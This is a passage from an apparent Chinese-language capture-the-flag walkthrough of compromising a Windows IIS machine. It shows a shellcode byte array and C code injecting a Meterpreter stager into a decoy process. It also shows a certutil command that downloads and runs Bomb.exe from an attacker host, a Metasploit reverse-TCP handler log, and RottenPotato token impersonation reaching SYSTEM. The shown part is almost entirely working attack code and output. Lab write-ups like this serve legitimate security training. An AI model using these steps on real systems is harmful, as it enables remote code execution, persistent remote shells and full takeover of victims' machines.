0xf9,0x46,0x7d,0xaf,0x16,0x26,0x7f,0xaf,0xe6,0x6f,0x09,0x4a,0xaf,0xd3,0x0b,
0x95,0x31,0x90,0x06,0x9e,0x3d,0xfc,0x57,0xf4,0x74,0x89,0xbc,0xb8,0x0f,0x78,
0x7d,0xfb,0x5c,0x0d,0x58,0xfc,0xa3,0x24,0xe8,0x8b,0xb6,0xae,0xf0,0x8a,0x46,
0x2e,0xaa,0xcd,0xfc,0x07,0xcc,0xa5,0x00,0xa8,0x19,0x53,0x0b,0x17,0xfc,0xf4,
0x5b,0xda,0x31,0x3c,0x16,0xd5,0xf1,0xf6,0x56,0xd5,0xba,0x8f,0x6b,0x9d,0xc5,
0x50,0x23,0x94,0xfb,0x10,0x0e,0x4c,0xf4,0x4d,0x8e,0x6f,0xde,0x3a,0xc6,0x48,
0x8b,0xaa,0x99,0x0e,0x00,0x42,0xfb,0xe6,0x11,0xad,0xbd,0x4c,0xb8,0xeb,0x4a,
0xd1,0x44,0x26,0x37,0xd1,0xcf,0xc5,0x71,0x2e,0xe1,0xa3,0x64,0xb8,0x0e,0xfe,
0xc5,0x6e,0x10,0xd4,0x42,0x0d,0x02,0xc7,0x1a,0x98,0x39,0xa5,0xab,0x53,0xd7,
0x32,0x8d,0x3b,0x60,0xb2,0xf4,0xfa,0xca,0xc6,0xdf,0x34,0x75,0x38,0x0a,0x8c,
0x09,0x02,0x95,0x52,0x87,0x7d,0xbc,0x2a,0xd6,0xd8,0x29,0xaa,0xc8,0xda,0xa9,
0xeb,0xb0,0x92,0x20,0x19,0x08,0x12,0xfa,0x9c,0x33,0x0c,0x58,0x4d,0xa1,0x52,
0x75,0x39,0xa0,0x6e,0x3f,0x30,0x75,0x3d,0xf1,0x8b,0x33,0x37,0x01,0x43,0x4d,
0x9d,0xaa,0xda,0xb4,0x63,0x91,0xde,0x9f,0xac,0xba,0x21,0xca,0x65,0x44,0x1e,
0xbd,0x5c,0x80,0xe8,0xbb,0x69,0x79,0x09,0x82,0x6a,0x65 };
DWORD pid;
pid = CreateDecoyProcess();
if (!pid) return 1;
InjectShellcode(shellcode, szShellcode, pid);
return 0;
}
這會將 meterpreter stager 注入遠端程序並執行 shellcode ,之後我們就獲得了一個 meterpreter 會話。
PS C:\windows\system32\inetsrv> cd \windows\temp PS C:\windows\temp> cmd.exe /c certutil.exe -urlcache -split -f http://10.11.12.26:80/Bomb.exe c:\windows\temp\bomb1.exe ****Online**** 000000... 020c00 CertUtil: -URLCache command completed successfully. PS C:\windows\temp> cmd.exe /c c:\windows\temp\bomb1.exe
然後我們可以通過 metasploit 處理程式獲得我們的 meterpreter 會話。
msf > handler -p windows/x64/meterpreter/reverse_tcp -H tun0 -P 443 [*] Payload handler running as background job 0. [*] [2018.09.16-15:13:49] Started reverse TCP handler on 10.11.12.26:443 msf exploit(multi/handler) > [*] [2018.09.16-15:14:07] Encoded stage with x64/xor [*] [2018.09.16-15:14:07] Sending encoded stage (206447 bytes) to 192.168.56.100 [*] Meterpreter session 1 opened (10.11.12.26:443 -> 192.168.56.100:49187) at 2018-09-16 15:14:08 -0700 [*] AutoAddRoute: Routing new subnet 10.11.12.0/255.255.255.0 through session 1 [*] AutoAddRoute: Routing new subnet 192.168.56.0/255.255.255.0 through session 1 [-] The 'stdapi' extension has already been loaded. meterpreter >
現在只需要將 RottenPotato.exe 上傳到 C:\windows\temp 目錄,然後執行 RottenPotato.exe 並模擬令牌許可權就可獲得 SYSTEM 許可權。
meterpreter > cd \\windows\\temp meterpreter > upload /mnt/hgfs/andre/ownCloud/auto/pentest/windows/exploits/RottenPotato . [*] uploading: /mnt/hgfs/andre/ownCloud/auto/pentest/windows/exploits/RottenPotato/README.md -> .\README.md [*] uploaded: /mnt/hgfs/andre/ownCloud/auto/pentest/windows/exploits/RottenPotato/README.md -> .\README.md [*] uploading: /mnt/hgfs/andre/ownCloud/auto/pentest/windows/exploits/RottenPotato/rottenpotato.exe -> .\rottenpotato.exe [*] uploaded: /mnt/hgfs/andre/ownCloud/auto/pentest/windows/exploits/RottenPotato/rottenpotato.exe -> .\rottenpotato.exe meterpreter > load incognito Loading extension incognito...Success. meterpreter > list_tokens -u [-] Warning: Not currently running as SYSTEM, not all tokens will be available Call rev2self if primary process token is SYSTEM Delegation Tokens Available ======================================== IIS APPPOOL\DefaultAppPool Impersonation Tokens Available ======================================== NT AUTHORITY\IUSR meterpreter > execute -f rottenpotato.exe Process 1896 created. meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM" [-] Warning: Not currently running as SYSTEM, not all tokens will be available Call rev2self if primary process token is SYSTEM [-] No delegation token available [+] Successfully impersonated user NT AUTHORITY\SYSTEM meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
從上面的輸出你可以看到,我們通過 meterpreter 拿到了 SYTEM 許可權,所以,我們現在完成了挑戰。